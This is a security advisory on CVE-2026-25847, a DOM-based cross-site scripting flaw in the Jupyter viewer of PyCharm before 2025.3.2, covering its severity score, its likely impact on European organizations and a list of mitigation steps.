CVE-2026-25847 is a DOM-based Cross-Site Scripting (XSS) vulnerability identified in JetBrains PyCharm, a widely used integrated development environment (IDE) for Python. The vulnerability specifically affects the Jupyter viewer page within PyCharm versions prior to 2025.3.2. DOM-based XSS occurs when client-side scripts write untrusted data to the Document Object Model (DOM) without proper sanitization, allowing attackers to inject and execute malicious scripts in the victim's browser context. In this case, an attacker can craft a malicious payload that, when viewed in the Jupyter viewer page, executes arbitrary JavaScript code. This can lead to theft of sensitive information, session hijacking, or manipulation of the IDE environment. The CVSS v3.1 score of 8.2 reflects high severity, with attack vector being network-based (remote), requiring high attack complexity, no privileges, but requiring user interaction. The scope is changed, indicating that the vulnerability affects components beyond the initially vulnerable code. Confidentiality and integrity impacts are high, while availability impact is low. No authentication is required, increasing the risk of exploitation. Although no exploits are currently known in the wild, the vulnerability poses a significant risk due to the widespread use of PyCharm in software development, especially in environments where Jupyter notebooks are used for data science and research. The lack of patch links suggests that a fix may be forthcoming or recently released. The vulnerability is tracked under CWE-79, a common and well-understood class of web security issues.

For European organizations, this vulnerability can have serious consequences, particularly for those involved in software development, data science, and research where PyCharm and Jupyter notebooks are heavily used. Exploitation could lead to unauthorized disclosure of sensitive code, credentials, or intellectual property, undermining confidentiality. Integrity of development environments could be compromised, allowing attackers to inject malicious code or alter project files, potentially leading to supply chain risks or compromised software releases. Although availability impact is low, the trustworthiness of development tools is critical, and any compromise can disrupt workflows and cause reputational damage. Organizations in sectors such as finance, healthcare, and critical infrastructure, which rely on secure development practices, may face heightened risks. The requirement for user interaction means phishing or social engineering could be used to trigger the exploit, increasing the attack surface. Given the network-based attack vector, remote attackers can target developers without needing internal access, broadening the threat landscape.

1. Immediately update PyCharm to version 2025.3.2 or later once the patch is officially released by JetBrains to remediate the vulnerability. 2. Until patching is possible, restrict access to the Jupyter viewer page or disable it if feasible to reduce exposure. 3. Implement strict Content Security Policies (CSP) within the development environment to limit the execution of unauthorized scripts. 4. Educate developers about the risks of clicking on untrusted links or opening unverified Jupyter notebooks within PyCharm to reduce the chance of user interaction-based exploitation. 5. Monitor network traffic and application logs for unusual activity related to the Jupyter viewer page or unexpected script execution. 6. Employ endpoint protection solutions capable of detecting and blocking script-based attacks within developer environments. 7. Review and sanitize any user-generated content or inputs that may be rendered in the Jupyter viewer to prevent injection of malicious payloads. 8. Coordinate with internal security teams to integrate this vulnerability into vulnerability management and incident response plans.